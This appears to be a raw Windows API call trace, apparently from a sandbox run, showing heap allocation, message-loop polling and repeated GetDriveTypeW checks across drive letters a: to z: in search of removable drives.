HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0216.730] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.730] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.731] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0216.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.731] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0216.731] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0216.731] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0216.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.731] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.731] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.732] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0216.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0216.732] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.732] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.732] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.732] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.732] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.732] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.733] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.733] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.733] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.733] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.734] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.734] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.734] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.734] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.734] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.735] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.735] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.735] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.735] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.735] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.736] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.736] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.736] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.737] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.737] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.737] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.737] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.737] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0216.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.738] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.738] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.738] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.738] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.738] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.738] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.738] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.739] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0216.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0216.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.739] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0216.739] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0216.739] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0216.739] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.739] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0216.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0216.740] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.740] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.740] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0216.740] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.740] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.740] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.741] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.741] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.741] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.741] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.741] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.741] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.741] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.741] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.742] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.742] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.742] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.742] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.742] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.742] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.743] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.743] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.743] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.743] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.743] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.749] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.749] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.750] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.750] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.750] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.750] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.750] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.751] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.751] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.751] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0216.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.751] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.752] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.752] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.752] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.752] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.752] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.752] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0216.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0216.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0216.752] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.752] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.752] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0216.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0216.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.753] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e300 [0216.753] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e300 | out: hHeap=0x12c0000) returned 1 [0216.753] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0216.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.753] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0216.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.754] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0216.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.754] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0216.754] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0216.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.754] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0216.754] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0216.754] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0216.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0216.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.755] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.755] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.755] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.755] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.755] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.756] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.756] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.756] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.756] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.756] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.757] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.757] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.757] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.757] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.758] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.758] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.758] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.758] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.758] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.759] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.759] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.759] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.759] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.760] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.760] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.760] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.760] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.760] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0216.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0216.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.763] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.763] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0216.763] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0216.764] RtlAllocateHeap 